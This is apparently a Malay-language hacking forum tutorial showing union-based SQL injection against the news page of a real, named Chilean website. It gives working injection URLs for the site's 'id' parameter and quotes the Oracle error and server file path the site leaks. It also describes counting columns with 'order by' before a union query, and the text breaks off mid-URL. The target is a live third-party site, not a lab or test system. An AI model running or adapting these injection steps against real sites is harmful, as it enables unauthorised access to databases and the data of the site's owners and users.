
So we gonna play with Oracle Database Injection
our target :http://www3.inn.clFirst using Union Based injection
1 - Kita mulakan check vuln dgn letak single quote '
Code:http://www3.inn.cl/noticias/index.php?id=2372'jika ade vuln,ia akan keluarkan error :
Quote:
Warning: ociparse(): OCIParse: ORA-01756: quoted string not properly terminated in /home/www/html/inn/noticias/_index.php on line 5Kita dapat lihat ORA-01756,dan dgn segera tahulah ini oracle injection kn?
2 - Kita cari bilangan column mcm biasa. order by 1-- sampai error
dan dari web ni,column yg ade = 9
3 - so kita teruskan dgn union injection kita
Code:http://www3.inn.cl/noticias/index.php?id=2372...